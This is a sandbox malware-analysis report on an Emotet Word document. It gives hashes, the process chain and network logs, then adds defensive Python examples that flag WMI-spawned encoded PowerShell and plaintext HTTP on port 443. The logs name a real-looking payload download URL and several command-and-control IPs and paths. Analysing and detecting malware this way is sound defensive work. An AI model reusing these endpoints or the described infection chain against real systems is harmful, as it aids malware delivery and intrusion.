| Field | Value |
|---|---|
| Sample (download) | 4sx8q-wzprpwl-dnyre |
| Full analysis | https://app.any.run/tasks/eb93cd7d-f867-40d7-ba44-50654b4d1f57 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a very destructive malware family. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | April 15, 2019, 12:30:16 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | - |
| Indicators | - |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 15 07:56:00 2019, Last Saved Time/Date: Mon Apr 15 07:56:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0 |
| MD5 | C8C1C3683A17C037ED9D64D7130D026A |
| SHA1 | FAE6BFF005238837CE12FC5BD7030ABEFC8A1FF7 |
| SHA256 | 32F07F132265AA1F9155AF93D8D0C0AC8D89B3972D33F5DBD25F53AB4EF9E5F7 |
| SSDEEP | 6144:L77HUUUUUUUUUUUUUUUUUUUT52VCPQAMUA0AUJkJn09YM:L77HUUUUUUUUUUUUUUUUUUUTCEQ1UAnI |
| Extension | File type | Confidence (%) |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | - |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 11 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | - |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 11 |
| Words | 1 |
| Pages | 1 |
| ModifyDate | 2019:04:15 06:56:00 |
| CreateDate | 2019:04:15 06:56:00 |
| TotalEditTime | - |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | - |
| Template | Normal.dotm |
| Comments | - |
| Keywords | - |
| Author | - |
| Subject | - |
| Title | - |
| PID | Command line | Path | Parent process | Process details |
|---|---|---|---|---|
| 1080 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4sx8q-wzprpwl-dnyre.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 1276 | PoWeRsHelL -e <encoded command removed> | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2240 | "C:\Users\admin\421.exe" | C:\Users\admin\421.exe | PoWeRsHelL.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 3116 | --725acb31 | C:\Users\admin\421.exe | 421.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 2388 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 421.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 2636 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | User: admin; Integrity level: MEDIUM; Exit code: 0 |
| 2484 | "C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe" | C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe | soundser.exe | User: admin; Company: 360.cn; Integrity level: MEDIUM; Description: 360 FirstAid; Exit code: 0; Version: 1, 0, 0, 1007 |
| 3104 | --46b75816 | C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe | zFgFNiwizdA6Tl.exe | User: admin; Company: 360.cn; Integrity level: MEDIUM; Description: 360 FirstAid; Exit code: 0; Version: 1, 0, 0, 1007 |
| 1924 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | zFgFNiwizdA6Tl.exe | User: admin; Company: 360.cn; Integrity level: MEDIUM; Description: 360 FirstAid; Exit code: 0; Version: 1, 0, 0, 1007 |
| 3656 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | User: admin; Company: 360.cn; Integrity level: MEDIUM; Description: 360 FirstAid; Version: 1, 0, 0, 1007 |
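Three things in the process tree above are worth turning into detection logic: the PowerShell stage (PID 1276) has WmiPrvSE.exe as its parent rather than WINWORD.EXE, which is what you see when a macro launches its payload through WMI (Win32_Process.Create) instead of calling CreateProcess itself; the downloaded 421.exe installs a copy as %LOCALAPPDATA%\soundser\soundser.exe, i.e. a directory and executable sharing one name; and every stage relaunches itself with a single `--<8 hex digits>` argument (--725acb31, --3ab57678, --46b75816). The following is an added example, not part of the ANY.RUN report: it runs those three checks over process-creation events constructed from the table above. The event schema (pid, image, cmdline, parent_image) is an assumed generic one, not a specific Sysmon or EDR format, and the base64 payload in the PowerShell event is a placeholder because the real encoded command is not preserved on this page.

```python
"""Process-tree checks for the Emotet chain shown in the report above.

Added example, not part of the ANY.RUN report. EVENTS is constructed from
the PIDs, images, command lines and parents in the process table; the
field names (pid, image, cmdline, parent_image) are an assumed generic
schema, not a specific Sysmon or EDR format.
"""
import re
from pathlib import PureWindowsPath

# Emotet drops itself to %LOCALAPPDATA%\<name>\<name>.exe (here soundser\soundser.exe).
SAME_NAME_LOCALAPPDATA = re.compile(r"\\AppData\\Local\\([^\\]+)\\\1\.exe$", re.I)
# Each stage relaunches itself with a single "--<8 hex digits>" argument
# (--725acb31, --3ab57678, --46b75816 in the report).
RELAUNCH_ARG = re.compile(r"(?:^|\s)--[0-9a-f]{8}$", re.I)


def uses_encoded_command(cmdline: str) -> bool:
    """True if any switch is an accepted abbreviation of -EncodedCommand.

    powershell.exe accepts every prefix of 'encodedcommand' that starts
    with 'e' (-e, -en, -enc, ...); -ec is not one, and -ex/-ep mean
    -ExecutionPolicy. Matching is case-insensitive because the sample
    used the case-mangled 'PoWeRsHelL -e'.
    """
    for tok in cmdline.split()[1:]:
        if tok.startswith(("-", "/")):
            switch = tok[1:].lower()
            if switch and "encodedcommand".startswith(switch):
                return True
    return False


def check_event(evt: dict) -> list[str]:
    """Return the names of the rules a single process-creation event trips."""
    hits = []
    image = PureWindowsPath(evt["image"]).name.lower()
    parent = PureWindowsPath(evt["parent_image"]).name.lower()
    # A macro that spawns via WMI (Win32_Process.Create) shows up under
    # WmiPrvSE.exe rather than WINWORD.EXE, exactly as PID 1276 does above.
    if (image in ("powershell.exe", "pwsh.exe") and parent == "wmiprvse.exe"
            and uses_encoded_command(evt["cmdline"])):
        hits.append("powershell_encoded_from_wmi")
    if SAME_NAME_LOCALAPPDATA.search(evt["image"]):
        hits.append("localappdata_same_name_exe")
    if RELAUNCH_ARG.search(evt["cmdline"].strip()):
        hits.append("emotet_style_relaunch_arg")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map PID -> rule hits for every event that trips at least one rule."""
    findings = {}
    for evt in events:
        hits = check_event(evt)
        if hits:
            findings[evt["pid"]] = hits
    return findings


WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DOC = r"C:\Users\admin\AppData\Local\Temp\4sx8q-wzprpwl-dnyre.doc"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe"
STAGE1 = r"C:\Users\admin\421.exe"
SOUNDSER = r"C:\Users\admin\AppData\Local\soundser\soundser.exe"
UPDATER = r"C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe"

EVENTS = [  # constructed from the process table; "QQBBAEEA" is a placeholder payload
    {"pid": 1080, "image": WORD, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f'"{WORD}" /n "{DOC}"'},
    {"pid": 1276, "image": PS, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "PoWeRsHelL -e QQBBAEEA"},
    {"pid": 2240, "image": STAGE1, "parent_image": PS, "cmdline": f'"{STAGE1}"'},
    {"pid": 3116, "image": STAGE1, "parent_image": STAGE1, "cmdline": "--725acb31"},
    {"pid": 2388, "image": SOUNDSER, "parent_image": STAGE1, "cmdline": f'"{SOUNDSER}"'},
    {"pid": 2636, "image": SOUNDSER, "parent_image": SOUNDSER, "cmdline": "--3ab57678"},
    {"pid": 2484, "image": UPDATER, "parent_image": SOUNDSER, "cmdline": f'"{UPDATER}"'},
    # Control: an encoded command launched from Explorer is not caught by the WMI rule.
    {"pid": 4000, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand QQBBAEEA"},
]

if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, ", ".join(rules))
```

The first rule deliberately keys on the WmiPrvSE.exe parent rather than on encoded PowerShell alone, because administrators do run `-EncodedCommand` legitimately; the control event at the end shows that case going unflagged. The update binary zFgFNiwizdA6Tl.exe is also not flagged on its own, which is correct for these rules: it only becomes interesting because it rewrites soundser.exe, as the files table below shows.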
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C71.tmp.cvr | — | — | — |
| 1276 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29J9NLDRBB50TJZ0NU58.temp | — | — | — |
| 1080 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | BAEC04A54AC968DB29FEE2F2ABDA0EA1 | 230C0E0381E2EA1B4CED9700B32635C2548CB4B0CE50C1D60F5BF49BA8E63985 |
| 1080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 3F569A8218CBE775F795510337AD8936 | 1FC2FDE26EE1F2247EB64B9FAE46FA33DBD991E746DC7CE1D7C2C44F247932E9 |
| 1276 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| 1276 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe7b27.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 |
| 3104 | zFgFNiwizdA6Tl.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | A8D7159693A8605DFD59C96F903836C7 | 2780491678D55C4C006F0F4A6A22312736CD2E2B2CCACA42FF6CC437C701F530 |
| 1080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$x8q-wzprpwl-dnyre.doc | pgc | 9379273A7646121ED0BD3AA060495B30 | 9096FF0241BBFC73912E30DF9267E0B1763C76AA4BEB26071A3C21C77D955C84 |
| 2636 | soundser.exe | C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe | executable | A8D7159693A8605DFD59C96F903836C7 | 2780491678D55C4C006F0F4A6A22312736CD2E2B2CCACA42FF6CC437C701F530 |
| 3116 | 421.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 346DE7B6C5B26596C227BE24BA1DBC61 | 7526436A4DC55A848F0517B1204CA7E7D749CFB3BB62C0237605FB9FB2A2BA5C |
| PID | Process | Method | HTTP code | IP:port | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2636 | soundser.exe | POST | — | 94.11.25.255:80 | http://94.11.25.255/sym/ | GB | — | — | malicious |
| 3656 | soundser.exe | POST | — | 117.193.28.115:80 | http://117.193.28.115/between/ | IN | — | — | malicious |
| 1276 | PoWeRsHelL.exe | GET | 200 | 104.18.33.28:80 | http://church228.com/wp-admin/x_g/ | US | executable | 130 Kb | suspicious |
| 2636 | soundser.exe | POST | — | 117.193.28.115:80 | http://117.193.28.115/schema/codec/ringin/ | IN | — | — | malicious |
| 3656 | soundser.exe | POST | — | 94.11.25.255:80 | http://94.11.25.255/acquire/ | GB | — | — | malicious |
| 3656 | soundser.exe | POST | — | 202.133.72.136:443 | http://202.133.72.136:443/health/ | IN | — | — | malicious |
| PID | Process | IP:port | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2636 | soundser.exe | 94.11.25.255:80 | — | Sky UK Limited | GB | malicious |
| 1276 | PoWeRsHelL.exe | 104.18.33.28:80 | church228.com | Cloudflare Inc | US | shared |
| 2636 | soundser.exe | 117.193.28.115:80 | — | National Internet Backbone | IN | malicious |
| 3656 | soundser.exe | 117.193.28.115:80 | — | National Internet Backbone | IN | malicious |
| — | — | 202.133.72.136:443 | — | Ddc Broadband Pvt. Ltd. | IN | malicious |
| 3656 | soundser.exe | 94.11.25.255:80 | — | Sky UK Limited | GB | malicious |
| 2636 | soundser.exe | 202.133.72.136:443 | — | Ddc Broadband Pvt. Ltd. | IN | malicious |
| Domain | IP | Reputation |
|---|---|---|
| church228.com | — | suspicious |
| PID | Process | Class | Message |
|---|---|---|---|
| 1276 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
| 1276 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
| 1276 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
| 1276 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
| 2636 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
| 2636 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
| 3656 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
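The two "ET POLICY HTTP traffic on port 443 (POST)" alerts correspond to the request to http://202.133.72.136:443/health/ in the HTTP table: the C2 channel is plain HTTP sent to the TLS port, so the IDS sees an HTTP request line where it would expect a TLS ClientHello. The check is cheap to reproduce on a proxy or packet capture. The following is an added example, not taken from the report or from the Emerging Threats rule set: it classifies the first client bytes of each flow to port 443 and alerts on plaintext HTTP. The flows are constructed; only the destination 202.133.72.136 and the paths /health/ and /sym/ come from the tables above, 10.0.0.5 stands in for the sandbox VM, and 198.51.100.7 is a made-up benign TLS destination.

```python
"""Flag plaintext HTTP on TCP/443, the condition behind the
'ET POLICY HTTP traffic on port 443 (POST)' alerts in the report above.

Added example, not from the report or the Emerging Threats rule set.
FLOWS is constructed; only the C2 address and URL paths come from the
report's HTTP table.
"""
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"PATCH ")


def classify_443_payload(payload: bytes) -> str:
    """Classify the first client bytes of a flow to port 443."""
    # A TLS ClientHello begins with record type 0x16 (handshake) and
    # version major byte 0x03; anything else on 443 deserves a look.
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03:
        return "tls"
    request_line = payload.split(b"\r\n", 1)[0]
    if payload.startswith(HTTP_METHODS) and b" HTTP/1." in request_line:
        return "plaintext_http"
    return "other"


def http_on_443_alerts(flows: list[dict]) -> list[str]:
    """One alert string per flow that speaks plaintext HTTP to port 443."""
    alerts = []
    for flow in flows:
        if flow["dport"] != 443:
            continue  # the port-80 C2 traffic is covered by other signatures
        if classify_443_payload(flow["payload"]) != "plaintext_http":
            continue
        method, target, _ = flow["payload"].split(b" ", 2)
        alerts.append(f"{flow['src']} -> {flow['dst']}:443 plaintext HTTP "
                      f"{method.decode()} {target.decode()}")
    return alerts


FLOWS = [  # constructed; 10.0.0.5 stands in for the sandbox VM
    {"src": "10.0.0.5", "dst": "202.133.72.136", "dport": 443,
     "payload": b"POST /health/ HTTP/1.1\r\nHost: 202.133.72.136:443\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: 4\r\n\r\nabcd"},
    # Benign control: the start of a real TLS ClientHello record header.
    {"src": "10.0.0.5", "dst": "198.51.100.7", "dport": 443,
     "payload": bytes.fromhex("160301004d0100004903036c")},
    # Port-80 C2 POST from the report: plaintext, but not on 443.
    {"src": "10.0.0.5", "dst": "94.11.25.255", "dport": 80,
     "payload": b"POST /sym/ HTTP/1.1\r\nHost: 94.11.25.255\r\n\r\n"},
]

if __name__ == "__main__":
    for line in http_on_443_alerts(FLOWS):
        print(line)
```

Looking only at the first record bytes is what keeps this check cheap enough to run inline; it will not catch HTTP tunnelled inside a genuine TLS session, which is a different problem and not what this sample did.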